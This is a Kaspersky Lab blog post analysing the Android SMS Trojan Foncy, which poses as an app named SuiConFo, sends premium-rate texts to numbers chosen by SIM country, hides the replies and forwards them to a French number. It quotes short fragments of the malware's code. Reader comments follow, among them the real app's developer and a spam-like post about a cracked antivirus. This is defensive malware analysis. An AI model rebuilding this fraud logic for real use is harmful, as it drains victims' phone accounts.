English
The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1

SMS Trojans: all around the world

Denis
Kaspersky Lab Expert
Posted November 25, 09:03  GMT
Tags: Mobile Malware
0.3
 

In the middle of July I wrote about porn SMS senders which covertly subscribed users to a range of premium-rate services with the promise of raunchy images. These applications were targeting users from the US, Malaysia, the Netherlands, the UK, Kenya and South Africa. At the end of that blog post I wrote that ‘…the appearance of several applications which use premium rate SMS messages and target users from completely different countries leads us to the conclusion that it’s no longer just a problem in Russia and China, unfortunately’.

Now this problem has evolved to SMS Trojans which target users from a number of European countries and Canada. Yes, these SMS Trojans don’t target either Russian or Chinese smartphone users.

According to the messages we found on Internet forums, the first infections were reported in early September. Somebody downloaded an application to manage and monitor his own SMS/MMS messages, calls and traffic. After launching this application it displayed the message that it was not compatible with the user’s Android version. And then the user’s mobile account was emptied.

We tracked down this application and unsurprisingly it turned up to be an SMS Trojan which sends 4 SMS messages to premium rate numbers. We detect it as Trojan-SMS.AndroidOS.Foncy.

It was spread via a file hosting website with the name ‘SuiConFo.apk’. After installation, it appears on the main menu of Android smartphones:

There are 2 main malicious classes of this Trojan: ‘MagicSMSActivity.class’ and ‘SMSReceiver.class’. The first is mainly responsible for sending SMS messages, while the second is used to hide incoming messages from specific numbers. As mentioned above, after launching this app shows an ‘Android version is not compatible’ error message:

Right after displaying this message the Trojan will call the public method getSimCountryIso in the TelephonyManager class in order to retrieve the ISO country code of the SIM card:

After that, the malware defines the variables ‘s1’ (SMS number) and ‘s2’ (SMS text):

The list of countries consists of 8 options: France (81001 SMS number), Belgium (9903 SMS number), Switzerland (543 SMS number), Luxembourg (64747 SMS number), Canada (60999 SMS number), Germany (63000 SMS number), Spain (35064 SMS number), and the UK (60999 SMS number).

It looks like the virus writers made a mistake in the code. The Trojan will send an SMS message using the SmsManager class with the sendTextMessage method:

smsmanager.sendTextMessage(s1, null, s2, pendingintent, pendingintent1)

where ‘s1’ is a number and ‘s2’ is a text. These variables are defined correctly for all countries except Canada:

if(s.equals("ca"))
{
s1 = "SP";
s2 = "60999";

After defining the country and, therefore, the number and message text, the Trojan will send 4 SMS messages with the help of the sendTextMessage method as mentioned above.

SMSReceiver.class is responsible for hiding incoming SMS messages from particular numbers. If there is an incoming SMS message from one of the following numbers: 81001, 35064, 63000, 9903, 60999, 543, 64747, then the Trojan will try to hide it using the abortBroadcast method. The number itself is retrieved from the SMS message with the help of getDisplayOriginatingAddress.

There is another interesting thing lurking inside this malware. If you look at this part of the code:

you may notice that after hiding the incoming message (abortBroadcast) this Trojan will send one more SMS to a French cell phone number with the text stored in the ‘s’ variable. And that ‘s’ variable is defined with the help of the getMessageBody method when an incoming SMS message arrives.

In other words, the Trojan will send an SMS message to a French cell phone number with the text taken from a reply from a premium rate number. This may help the cybercriminals find out how many premium SMS messages have been sent.

Unfortunately, today SMS Trojans are one the easiest ways for cybercriminals to make easy money fast. Malicious use of premium rate SMS services is spreading around the world, and I’m pretty sure it’s not going to stop any time soon. We’ll keep you posted.


3 comments

Oldest first
Threaded view
 

aloudroid

2011 Nov 29, 12:13
0
 

The "real" SuiConFo is not a malicious app

Hi, I'm the developper of the real SuiConFo app, which is a paid app, rated 4.3 stars on the Android Market.
That SuiConFo.apk that can be found on the internet has NOTHING to do with the original application.
My app can only be bought on the Android Market and YAAM (alternative market) and is not a free app. It helps you track your plan efficiently, and does not send messages or share your data to/with anyone.

People should use trusted sources to download apps on their phones, and obviously, a 4.3 rated paid app doesn't contain a trojan or any sort of malware.

Analyze the code of the app from the market and you'll see it doesn't contain the code samples that were found in this article : https://market.android.com/details?id=com.aloudroid.suiviforfait

Best regards,

Alou

Reply    

osama

2011 Dec 02, 02:42
0
 

aloudroid

Kaspersky Anti-Virus 6.0 for Windows Workstations MP4 Reload Rbz

Reload Rbz

Device Kabiotr

Reply    

Joshua Wright

2012 Feb 23, 20:21
0
 

Permission declaration for Foncy

Denis,

Looking at this malware sample retrieved from Contagio Mobile, a lot of permissions are declared in the AndroidManifest.xml file including SEND_SMS and RECEIVE_SMS (of course), but also READ_CONTACTS, ACCESS_GPS, ACCESS_LOCATION and others. When I install this app in the Android Emulator with GPS and GSM support, the installer only prompts me about the receive and send SMS privileges, not for any other of the declared privileges. Do you know why this is?

Thanks,

-Josh

Reply    
If you would like to comment on this article you must first
login


Bookmark and Share
Share

Analysis

Blog